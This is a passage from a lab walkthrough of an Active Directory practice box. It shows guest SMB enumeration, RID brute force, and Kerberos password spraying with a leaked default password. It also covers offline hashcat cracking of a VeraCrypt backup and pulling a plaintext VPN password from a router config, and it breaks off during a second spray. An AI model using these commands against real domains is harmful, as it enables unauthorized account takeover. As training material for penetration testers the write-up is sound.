Executive Summary
Phantom is an Active Directory box where the entire path from unauthenticated guest to Domain Admin comes down to credential reuse and secrets sitting in accessible file shares. There's no memory-corruption or exotic exploit anywhere in the chain — every step is "find a leaked secret, use it to get the next one."
High-level path:
- Guest SMB access → leaked default onboarding password (
Ph4nt0m@5t4rt!) in a PDF template on thePublicshare. - Password spray with that default → low-priv user
ibryant. -
ibryantcan read theDepartments Share→ IT folder contains a VeraCrypt-encrypted backup container. - Container cracked offline with hashcat → mounted → contains a VyOS router config backup.
- VyOS config (
config.boot) has an SSTP VPN local user password stored in plaintext forlstanley(gB6XTcqVP5MlP7Rc). - Password reuse: that same password is actually the credential for the service account
svc_sspr→ foothold +user.txt. - BloodHound shows
svc_ssprholds ForceChangePassword over three users, one of whom (rnichols) is in a group (ICT Security) with AddAllowedToAct rights on the DC computer object - a Resource-Based Constrained Delegation (RBCD) path. - Abuse ForceChangePassword → set a known password/hash on a delegatable account → configure RBCD to allow that account to impersonate anyone against
DC$→ S4U2Self+U2U / S4U2Proxy to impersonate Administrator. - Full SYSTEM/Administrator access,
root.txt, and NTDS dump → domain compromised.
1. Reconnaissance
1.1 Nmap
nmap -A -Pn MACHINE-IP -oA nmap
Starting Nmap 7.98 ( https://nmap.org ) at 2026-07-07 12:38 -0400
Nmap scan report for MACHINE-IP
Host is up (0.27s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-07-07 16:39:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: phantom.vl, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: PHANTOM
| NetBIOS_Domain_Name: PHANTOM
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: phantom.vl
| DNS_Computer_Name: DC.phantom.vl
|_ System_Time: 2026-07-07T16:40:39+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: "Not Found"
...
Nmap done: 1 IP address (1 host up) scanned in 167.43 seconds
Confirmed it's a Domain Controller for phantom.vl.
Added to /etc/hosts:
echo 'MACHINE-IP phantom.vl DC.phantom.vl dc.phantom.vl' >> /etc/hosts
2. SMB / Guest Enumeration
2.1 Null and Guest Sessions
nxc smb MACHINE-IP -u '' -p ''
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\:
nxc smb MACHINE-IP -u '' -p '' --shares
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\:
SMB MACHINE-IP 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
Null auth logs in but can't list shares. Guest can:
nxc smb MACHINE-IP -u 'guest' -p ''
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\guest:
nxc smb MACHINE-IP -u 'guest' -p '' --shares
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\guest:
SMB MACHINE-IP 445 DC [*] Enumerated shares
SMB MACHINE-IP 445 DC Share Permissions Remark
SMB MACHINE-IP 445 DC ----- ----------- ------
SMB MACHINE-IP 445 DC ADMIN$ Remote Admin
SMB MACHINE-IP 445 DC C$ Default share
SMB MACHINE-IP 445 DC Departments Share
SMB MACHINE-IP 445 DC IPC$ READ Remote IPC
SMB MACHINE-IP 445 DC NETLOGON Logon server share
SMB MACHINE-IP 445 DC Public READ
SMB MACHINE-IP 445 DC SYSVOL Logon server share
2.2 RID Brute → User List
nxc smb MACHINE-IP -u 'guest' -p '' --rid-brute
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\guest:
SMB MACHINE-IP 445 DC 498: PHANTOM\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB MACHINE-IP 445 DC 500: PHANTOM\Administrator (SidTypeUser)
SMB MACHINE-IP 445 DC 501: PHANTOM\Guest (SidTypeUser)
SMB MACHINE-IP 445 DC 502: PHANTOM\krbtgt (SidTypeUser)
SMB MACHINE-IP 445 DC 512: PHANTOM\Domain Admins (SidTypeGroup)
SMB MACHINE-IP 445 DC 513: PHANTOM\Domain Users (SidTypeGroup)
...
SMB MACHINE-IP 445 DC 1000: PHANTOM\DC$ (SidTypeUser)
SMB MACHINE-IP 445 DC 1101: PHANTOM\DnsAdmins (SidTypeAlias)
SMB MACHINE-IP 445 DC 1102: PHANTOM\DnsUpdateProxy (SidTypeGroup)
SMB MACHINE-IP 445 DC 1103: PHANTOM\svc_sspr (SidTypeUser)
SMB MACHINE-IP 445 DC 1104: PHANTOM\TechSupports (SidTypeGroup)
SMB MACHINE-IP 445 DC 1105: PHANTOM\Server Admins (SidTypeGroup)
SMB MACHINE-IP 445 DC 1106: PHANTOM\ICT Security (SidTypeGroup)
SMB MACHINE-IP 445 DC 1107: PHANTOM\DevOps (SidTypeGroup)
SMB MACHINE-IP 445 DC 1108: PHANTOM\Accountants (SidTypeGroup)
SMB MACHINE-IP 445 DC 1109: PHANTOM\FinManagers (SidTypeGroup)
SMB MACHINE-IP 445 DC 1110: PHANTOM\EmployeeRelations (SidTypeGroup)
SMB MACHINE-IP 445 DC 1111: PHANTOM\HRManagers (SidTypeGroup)
SMB MACHINE-IP 445 DC 1112: PHANTOM\rnichols (SidTypeUser)
...
SMB MACHINE-IP 445 DC 1126: PHANTOM\crose (SidTypeUser)
...
SMB MACHINE-IP 445 DC 1130: PHANTOM\alucas (SidTypeUser)
...
SMB MACHINE-IP 445 DC 1137: PHANTOM\SSPR Service (SidTypeGroup)
Piped straight into a clean user list:
nxc smb MACHINE-IP -u 'guest' -p '' --rid-brute \
| awk -F'\\\\' '/SidTypeUser/ {split($2,a," "); print a[1]}' > users.txt
cat users.txt
Administrator
Guest
krbtgt
DC$
svc_sspr
rnichols
pharrison
wsilva
elynch
nhamilton
lstanley
bbarnes
cjones
agarcia
ppayne
ibryant
ssteward
wstewart
vhoward
crose
twright
fhanson
cferguson
alucas
ebryant
vlynch
ghall
ssimpson
ccooper
vcunningham
30 domain users, plus interesting custom groups spotted in the RID dump: TechSupports, Server Admins, ICT Security, DevOps, Accountants, FinManagers, EmployeeRelations, HRManagers, SSPR Service.
3. Initial Foothold — Leaked Default Password
The Public share (guest-readable) contained a support email:
smbclient //phantom.vl/Public -U guest%''
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jul 11 11:03:14 2024
.. DHS 0 Thu Aug 14 07:55:49 2025
tech_support_email.eml A 14565 Sat Jul 6 12:08:43 2024
6127103 blocks of size 4096. 1460793 blocks available
smb: \> get tech_support_email.eml
getting file \tech_support_email.eml of size 14565 as tech_support_email.eml (5.0 KiloBytes/sec) (average 5.0 KiloBytes/sec)
smb: \>
The .eml (from alucas@phantom.vl to techsupport@phantom.vl, subject "New Welcome Email Template for New Employees") had a base64-encoded PDF attachment. Extracted with munpack:
munpack tech_support_email.eml
welcome_template.pdf.1 (application/pdf)
Opening the PDF revealed the onboarding template — a placeholder welcome email with a hardcoded default password baked in for every new hire:
Username: <USERNAME>
Password: Ph4nt0m@5t4rt!
Password Spray #1
kerbrute passwordspray -d phantom.vl --dc dc.phantom.vl users.txt 'Ph4nt0m@5t4rt!'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 07/07/26 - Ronnie Flathers @ropnop
2026/07/07 12:58:07 > Using KDC(s):
2026/07/07 12:58:07 > dc.phantom.vl:88
2026/07/07 12:58:18 > [!] svc_sspr@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:18 > [!] Administrator@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:18 > [!] DC$@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:19 > [!] elynch@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:19 > [!] pharrison@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:19 > [!] Guest@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 > [!] rnichols@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 > [!] nhamilton@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 > [!] wsilva@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:20 > [!] lstanley@phantom.vl:Ph4nt0m@5t4rt! - NETWORK ERROR - Can't talk to KDC. Aborting...
2026/07/07 12:58:28 > [+] VALID LOGIN: ibryant@phantom.vl:Ph4nt0m@5t4rt!
2026/07/07 12:58:28 > Done! Tested 22 logins (1 successes) in 20.405 seconds
(The NETWORK ERROR lines are Kerberos pre-auth being flaky against the DC for a handful of accounts, not a real block — the spray still ran to completion and found the hit.) One new-hire (ibryant) never rotated the default onboarding password.
4. Authenticated Enumeration as ibryant
4.1 LDAP Groups
nxc ldap phantom.vl -u ibryant -p 'Ph4nt0m@5t4rt!' --groups
LDAP MACHINE-IP 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP MACHINE-IP 389 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
LDAP MACHINE-IP 389 DC -Group- -Members- -Description-
LDAP MACHINE-IP 389 DC Administrators 3 Administrators have complete and unrestricted access to the computer/domain
LDAP MACHINE-IP 389 DC Users 3 Users are prevented from making accidental or intentional system-wide changes and can run most applications
LDAP MACHINE-IP 389 DC Guests 2 Guests have the same access as members of the Users group by default, except for the Guest account which is further restricted
LDAP MACHINE-IP 389 DC Print Operators 0 Members can administer printers installed on domain controllers
LDAP MACHINE-IP 389 DC Backup Operators 0 Backup Operators can override security restrictions for the sole purpose of backing up or restoring files
LDAP MACHINE-IP 389 DC Replicator 0 Supports file replication in a domain
LDAP MACHINE-IP 389 DC Remote Desktop Users 0 Members in this group are granted the right to logon remotely
LDAP MACHINE-IP 389 DC Network Configuration Operators 0 Members in this group can have some administrative privileges to manage configuration of networking features
LDAP MACHINE-IP 389 DC Performance Monitor Users 0 Members of this group can access performance counter data locally and remotely
LDAP MACHINE-IP 389 DC Performance Log Users 0 Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer
LDAP MACHINE-IP 389 DC Distributed COM Users 0 Members are allowed to launch, activate and use Distributed COM objects on this machine.
LDAP MACHINE-IP 389 DC IIS_IUSRS 1 Built-in group used by Internet Information Services.
LDAP MACHINE-IP 389 DC Cryptographic Operators 0 Members are authorized to perform cryptographic operations.
LDAP MACHINE-IP 389 DC Event Log Readers 0 Members of this group can read event logs from local machine
LDAP MACHINE-IP 389 DC Certificate Service DCOM Access 0 Members of this group are allowed to connect to Certification Authorities in the enterprise
LDAP MACHINE-IP 389 DC RDS Remote Access Servers 0 Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources.
LDAP MACHINE-IP 389 DC RDS Endpoint Servers 0 Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run.
LDAP MACHINE-IP 389 DC RDS Management Servers 0 Servers in this group can perform routine administrative actions on servers running Remote Desktop Services.
LDAP MACHINE-IP 389 DC Hyper-V Administrators 0 Members of this group have complete and unrestricted access to all features of Hyper-V.
LDAP MACHINE-IP 389 DC Access Control Assistance Operators 0 Members of this group can remotely query authorization attributes and permissions for resources on this computer.
LDAP MACHINE-IP 389 DC Remote Management Users 1 Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service).
LDAP MACHINE-IP 389 DC Storage Replica Administrators 0 Members of this group have complete and unrestricted access to all features of Storage Replica.
LDAP MACHINE-IP 389 DC Domain Computers 0 All workstations and servers joined to the domain
LDAP MACHINE-IP 389 DC Domain Controllers 0 All domain controllers in the domain
LDAP MACHINE-IP 389 DC Schema Admins 1 Designated administrators of the schema
LDAP MACHINE-IP 389 DC Enterprise Admins 1 Designated administrators of the enterprise
LDAP MACHINE-IP 389 DC Cert Publishers 0 Members of this group are permitted to publish certificates to the directory
LDAP MACHINE-IP 389 DC Domain Admins 1 Designated administrators of the domain
LDAP MACHINE-IP 389 DC Domain Users 0 All domain users
LDAP MACHINE-IP 389 DC Domain Guests 0 All domain guests
LDAP MACHINE-IP 389 DC Group Policy Creator Owners 1 Members in this group can modify group policy for the domain
LDAP MACHINE-IP 389 DC RAS and IAS Servers 0 Servers in this group can access remote access properties of users
LDAP MACHINE-IP 389 DC Server Operators 0 Members can administer domain servers
LDAP MACHINE-IP 389 DC Account Operators 0 Members can administer domain user and group accounts
LDAP MACHINE-IP 389 DC Pre-Windows 2000 Compatible Access 1 A backward compatibility group which allows read access on all users and groups in the domain
LDAP MACHINE-IP 389 DC Incoming Forest Trust Builders 0 Members of this group can create incoming, one-way trusts to this forest
LDAP MACHINE-IP 389 DC Windows Authorization Access Group 1 Members of this group have access to the computed tokenGroupsGlobalAndUniversal attribute on User objects
LDAP MACHINE-IP 389 DC Terminal Server License Servers 0 Members of this group can update user accounts in Active Directory with information about license issuance
LDAP MACHINE-IP 389 DC Allowed RODC Password Replication Group 0 Members in this group can have their passwords replicated to all read-only domain controllers in the domain
LDAP MACHINE-IP 389 DC Denied RODC Password Replication Group 8 Members in this group cannot have their passwords replicated to any read-only domain controllers in the domain
LDAP MACHINE-IP 389 DC Read-only Domain Controllers 0 Members of this group are Read-Only Domain Controllers in the domain
LDAP MACHINE-IP 389 DC Enterprise Read-only Domain Controllers 0 Members of this group are Read-Only Domain Controllers in the enterprise
LDAP MACHINE-IP 389 DC Cloneable Domain Controllers 0 Members of this group that are domain controllers may be cloned.
LDAP MACHINE-IP 389 DC Protected Users 0 Members of this group are afforded additional protections against authentication security threats.
LDAP MACHINE-IP 389 DC Key Admins 0 Members of this group can perform administrative actions on key objects within the domain.
LDAP MACHINE-IP 389 DC Enterprise Key Admins 0 Members of this group can perform administrative actions on key objects within the forest.
LDAP MACHINE-IP 389 DC DnsAdmins 0 DNS Administrators Group
LDAP MACHINE-IP 389 DC DnsUpdateProxy 0 DNS clients who are permitted to perform dynamic updates on behalf of some other clients (such as DHCP servers).
LDAP MACHINE-IP 389 DC TechSupports 3
LDAP MACHINE-IP 389 DC Server Admins 4
LDAP MACHINE-IP 389 DC ICT Security 3
LDAP MACHINE-IP 389 DC DevOps 1
LDAP MACHINE-IP 389 DC Accountants 3
LDAP MACHINE-IP 389 DC FinManagers 7
LDAP MACHINE-IP 389 DC EmployeeRelations 4
LDAP MACHINE-IP 389 DC HRManagers 2
LDAP MACHINE-IP 389 DC SSPR Service 1
SSPR Service has exactly 1 member - worth checking directly who that is:
nxc ldap MACHINE-IP -u ibryant -p 'Ph4nt0m@5t4rt!' --groups "SSPR Service"
LDAP MACHINE-IP 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:phantom.vl) (signing:None) (channel binding:No TLS cert)
LDAP MACHINE-IP 389 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
LDAP MACHINE-IP 389 DC svc_sspr
Confirmed: svc_sspr is the sole member of SSPR Service - a self-service-password-reset service account. The naming (SSPR = self-service password reset) is a strong hint this account has some kind of password-reset capability over other users, which turns out to be exactly right once BloodHound is loaded (Section 7).
4.2 BloodHound Collection
bloodhound-python \
-u ibryant -p 'Ph4nt0m@5t4rt!' \
-d phantom.vl \
-dc dc.phantom.vl \
-ns MACHINE-IP \
-c All \
--zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: phantom.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::b25e:f856:306c:8016
INFO: Trying LDAP connection to dead:beef::b25e:f856:306c:8016
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.phantom.vl
INFO: Testing resolved hostname connectivity dead:beef::b25e:f856:306c:8016
INFO: Trying LDAP connection to dead:beef::b25e:f856:306c:8016
INFO: Found 30 users
INFO: Found 61 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.phantom.vl
INFO: Done in 01M 09S
INFO: Compressing output into 20260707130607_bloodhound.zip
Kerberoasting came back empty - no SPNs to target:
impacket-GetUserSPNs phantom.vl/ibryant:'Ph4nt0m@5t4rt!' -dc-ip MACHINE-IP -request
Impacket v0.14.0.dev0+20260226.31512.9d3d86ea - Copyright Fortra, LLC and its affiliated companies
No entries found!
4.3 Share Access
nxc smb phantom.vl -u ibryant -p 'Ph4nt0m@5t4rt!' --shares
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\ibryant:Ph4nt0m@5t4rt!
SMB MACHINE-IP 445 DC [*] Enumerated shares
SMB MACHINE-IP 445 DC Share Permissions Remark
SMB MACHINE-IP 445 DC ----- ----------- ------
SMB MACHINE-IP 445 DC ADMIN$ Remote Admin
SMB MACHINE-IP 445 DC C$ Default share
SMB MACHINE-IP 445 DC Departments Share READ
SMB MACHINE-IP 445 DC IPC$ READ Remote IPC
SMB MACHINE-IP 445 DC NETLOGON READ Logon server share
SMB MACHINE-IP 445 DC Public READ
SMB MACHINE-IP 445 DC SYSVOL READ Logon server share
ibryant now has READ on Departments Share (guest couldn't even see permissions on it). Browsing it:
smbclient //phantom.vl/'Departments Share' -U ibryant%'Ph4nt0m@5t4rt!'
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 6 12:25:31 2024
.. DHS 0 Thu Aug 14 07:55:49 2025
Finance D 0 Sat Jul 6 12:25:11 2024
HR D 0 Sat Jul 6 12:21:31 2024
IT D 0 Thu Jul 11 10:59:02 2024
6127103 blocks of size 4096. 1683946 blocks available
smb: \> prompt off
smb: \> cd Finance
smb: \Finance\> ls
. D 0 Sat Jul 6 12:25:11 2024
.. D 0 Sat Jul 6 12:25:31 2024
Expense_Reports.pdf A 709718 Sat Jul 6 12:25:11 2024
Invoice-Template.pdf A 190135 Sat Jul 6 12:23:54 2024
TaxForm.pdf A 160747 Sat Jul 6 12:22:58 2024
6127103 blocks of size 4096. 1683946 blocks available
smb: \Finance\> mget *
getting file \Finance\Expense_Reports.pdf of size 709718 as Expense_Reports.pdf (307.8 KiloBytes/sec) (average 307.8 KiloBytes/sec)
getting file \Finance\Invoice-Template.pdf of size 190135 as Invoice-Template.pdf (183.5 KiloBytes/sec) (average 269.2 KiloBytes/sec)
getting file \Finance\TaxForm.pdf of size 160747 as TaxForm.pdf (157.8 KiloBytes/sec) (average 243.2 KiloBytes/sec)
smb: \Finance\> cd ..
smb: \> cd HR
smb: \HR\> ls
. D 0 Sat Jul 6 12:21:31 2024
.. D 0 Sat Jul 6 12:25:31 2024
Employee-Emergency-Contact-Form.pdf A 21861 Sat Jul 6 12:21:31 2024
EmployeeHandbook.pdf A 296436 Sat Jul 6 12:16:25 2024
Health_Safety_Information.pdf A 3940231 Sat Jul 6 12:20:39 2024
NDA_Template.pdf A 18790 Sat Jul 6 12:17:33 2024
6127103 blocks of size 4096. 1683946 blocks available
smb: \HR\> cd ..
smb: \> cd IT\
smb: \IT\> ls
. D 0 Thu Jul 11 10:59:02 2024
.. D 0 Sat Jul 6 12:25:31 2024
Backup D 0 Sat Jul 6 14:04:34 2024
mRemoteNG-Installer-1.76.20.24615.msi A 43593728 Sat Jul 6 12:14:26 2024
TeamViewerQS_x64.exe A 32498992 Sat Jul 6 12:26:59 2024
TeamViewer_Setup_x64.exe A 80383920 Sat Jul 6 12:27:15 2024
veracrypt-1.26.7-Ubuntu-22.04-amd64.deb A 9201076 Sun Oct 1 16:30:37 2023
Wireshark-4.2.5-x64.exe A 86489296 Sat Jul 6 12:14:08 2024
6127103 blocks of size 4096. 1683946 blocks available
smb: \IT\> cd Backup\
smb: \IT\Backup\> ls
. D 0 Sat Jul 6 14:04:34 2024
.. D 0 Thu Jul 11 10:59:02 2024
IT_BACKUP_201123.hc A 12582912 Sat Jul 6 14:04:14 2024
6127103 blocks of size 4096. 1683946 blocks available
smb: \IT\Backup\> get IT_BACKUP_201123.hc
Finance/ — expense reports, invoice template, tax form — reviewed, nothing directly actionable.
HR/ — handbook, NDA template, emergency contact form — standard onboarding paperwork, nothing actionable.
IT/ — a grab-bag of installer binaries (mRemoteNG, TeamViewer, Wireshark, VeraCrypt .deb) plus a Backup/ subfolder containing IT_BACKUP_201123.hc.
The VeraCrypt installer sitting right next to a .hc file is the tell — this is a VeraCrypt encrypted container.
5. Cracking the VeraCrypt Container
hashcat -m 13721 IT_BACKUP_201123.hc custom_wordlist.txt --force
Mode 13721 = VeraCrypt SHA512 + XTS 512-bit (legacy). Ran against a custom wordlist:
wc -l custom_wordlist.txt
161280 custom_wordlist.txt
Slow going (~16 H/s on this hash mode), but it cracked after roughly 1h40m:
hashcat (v7.1.2) starting
IT_BACKUP_201123.hc:Phantom2023!
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13721 (VeraCrypt SHA512 + XTS 512 bit (legacy))
Hash.Target......: IT_BACKUP_201123.hc
Time.Started.....: Tue Jul 7 22:53:38 2026, (1 hour, 41 mins)
Time.Estimated...: Wed Jul 8 00:34:47 2026, (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-128 bytes)
Guess.Base.......: File (custom_wordlist.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 16 H/s (8.51ms) @ Accel:181 Loops:1000 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 80545/161280 (49.94%)
Rejected.........: 0/80545 (0.00%)
Restore.Point....: 80364/161280 (49.83%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:499000-499999
Candidate.Engine.: Device Generator
Candidates.#01...: Phantom*22* -> Phantom24$
Hardware.Mon.#01.: Util: 81%
Started: Tue Jul 7 22:53:00 2026
Stopped: Wed Jul 8 00:34:50 2026
Container password: Phantom2023!
Mounting
Kali doesn't ship VeraCrypt by default, so the CLI tool has to be installed first before the container can be opened.
Step 1 - download the official VeraCrypt Debian package:
wget https://github.com/veracrypt/VeraCrypt/releases/download/VeraCrypt_1.26.29/veracrypt-1.26.29-Debian-12-amd64.deb
Step 2 - install it:
sudo apt install ./veracrypt-1.26.29-Debian-12-amd64.deb
This pulls in the VeraCrypt binary and its FUSE-based mounting driver, which is what lets an encrypted container be mounted as a regular filesystem without needing a kernel module.
Step 3 - mount the container using the cracked password:
sudo veracrypt IT_BACKUP_201123.hc /mnt/ --password='Phantom2023!'
veracrypt decrypts the container header with the supplied password (confirming the hashcat crack was correct), then mounts the decrypted volume at /mnt/ just like any other disk - ls, cd, cp, etc. all work normally against it from that point on. No prompts, no separate "unlock" step; if the password is wrong the mount simply fails.
Step 4 - browse the mounted volume:
ls /mnt/
'$RECYCLE.BIN' azure_vms_1104.json splunk_logs_1102 ticketing_system_backup.zip
azure_vms_0805.json azure_vms_1123.json splunk_logs1203 vyos_backup.tar.gz
azure_vms_1023.json splunk_logs_1003 'System Volume Information'
This is an old IT backup drive - mixed bag of Azure VM inventory exports, Splunk log dumps, a ticketing system backup, and a VyOS router config backup. vyos_backup.tar.gz is the one worth prioritizing.
VyOS Config Extraction
tar -tvzf vyos_backup.tar.gz | head -n 150
drwxr-xr-x root/root 0 2024-07-06 15:31 ./
lrwxrwxrwx root/root 0 2024-07-05 20:21 bin -> usr/bin
drwxrwsr-x root/vyattacfg 0 2024-07-06 15:31 config/
drwxrwsr-x root/vyattacfg 0 2024-07-06 13:21 config/archive/
-rw-rw-r-- vyos/vyattacfg 1297 2024-07-06 13:04 config/archive/config.boot.4.gz
-rw-rw-r-- vyos/vyattacfg 3630 2024-07-06 13:06 config/archive/config.boot.3.gz
-rw-rw-r-- root/vyattacfg 413 2024-07-06 13:00 config/archive/config.boot.8.gz
-rw-rw-r-- vyos/vyattacfg 1128 2024-07-06 13:04 config/archive/config.boot.5.gz
-rw-rw---- root/vyattacfg 5769 2024-07-06 13:21 config/archive/config.boot.0.gz
-rw-rw---- root/vyattacfg 907 2024-07-06 13:00 config/archive/config.boot.7.gz
-rw-rw---- root/vyattacfg 10705 2024-07-06 13:21 config/archive/config.boot
-rw-r--r-- root/vyattacfg 118 2024-07-06 15:31 config/archive/lr.conf
-rw-rw-r-- vyos/vyattacfg 926 2024-07-06 13:03 config/archive/config.boot.6.gz
-rw-r----- root/vyattacfg 92 2024-07-06 13:21 config/archive/lr.state
-rw-rw-r-- root/vyattacfg 302 2024-07-06 13:21 config/archive/commits
-rw-rw-r-- vyos/vyattacfg 5770 2024-07-06 13:07 config/archive/config.boot.1.gz
-rw-rw-r-- vyos/vyattacfg 5621 2024-07-06 13:07 config/archive/config.boot.2.gz
drwxrwsr-x root/vyattacfg 0 2024-07-05 22:46 config/support/
-rw-r--r-- root/vyattacfg 174 2024-07-06 15:31 config/vyos-activate.log
-rw-r--r-- root/vyattacfg 0 2024-07-06 12:59 config/.vyatta_config
-rw-rw---- root/vyattacfg 10705 2024-07-06 15:31 config/config.boot
drwxrwsr-x root/vyattacfg 0 2024-07-05 22:46 config/auth/
drwxrwsr-x root/vyattacfg 0 2024-07-05 22:46 config/user-data/
drwxrwsr-x root/vyattacfg 0 2024-07-05 22:46 config/scripts/
-rwxr-xr-x root/vyattacfg 225 2024-07-05 22:46 config/scripts/vyos-preconfig-bootup.script
-rwxr-xr-x root/vyattacfg 230 2024-07-05 22:46 config/scripts/vyos-postconfig-bootup.script
drwxr-xr-x root/root 0 2024-07-06 15:31 etc/
...
Rest of the archive is a standard Debian-based VyOS root filesystem (/etc, /var, FRR routing daemon state under /var/tmp/frr/, nginx default page under /var/www/html/, etc.) — none of that is directly useful. Cross-checked against VyOS itself which files are worth pulling:
Reference used: confirmed via VyOS documentation that
/config/auth/and/config/config.bootare the primary locations for sensitive material (private keys, API keys, passwords) in a VyOS config backup — VyOS PKI docs, VyOS task T2713, VyOS task T6907, nodespace quick-start guide, VyOS forum thread. This is what justified going straight forconfig.bootinstead of grinding through the whole tarball.
While going through the archive listing, everything under config/archive/ besides config.boot itself turned out to be 0-byte placeholders or compressed rotations - the live config is config/config.boot:
tar -xOzf vyos_backup.tar.gz config/config.boot | less
Inside, under the SSTP VPN config block, a local VPN user with a plaintext password:
global {
facility all {
level "info"
}
facility local7 {
level "debug"
}
}
}
}
vpn {
sstp {
authentication {
local-users {
username lstanley {
password "gB6XTcqVP5MlP7Rc"
}
}
mode "local"
}
client-ip-pool SSTP-POOL {
range "10.0.0.2-10.0.0.100"
}
default-pool "SSTP-POOL"
gateway-address "10.0.0.1"
ssl {
ca-certificate "CA"
certificate "Server"
6. Password Spray #2 - Credential Reuse to svc_sspr
Tried the leaked password directly against the named account first:
nxc smb phantom.vl -u lstanly -p 'gB6XTcqVP5MlP7Rc'
SMB MACHINE-IP 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:phantom.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB MACHINE-IP 445 DC [+] phantom.vl\lstanly:gB6XTcqVP5MlP7Rc (Guest)
(A typo — lstanly instead of lstanley - falls back to a Guest session rather than erroring, which is itself worth noting as odd AD behavior.) Rather than chase the exact username, sprayed the full user list instead, since VPN credentials and AD credentials aren't guaranteed to belong to the same account:
kerbrute passwordspray -d phantom.vl --dc dc.phantom.vl users.txt gB6XTcqVP5MlP7Rc
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 07/08/26 - Ronnie Flathers @ropnop
2026/07/08 01:00:09 > Using KDC(s):
2026/07/08 01:00:09 > dc.phantom.vl:88
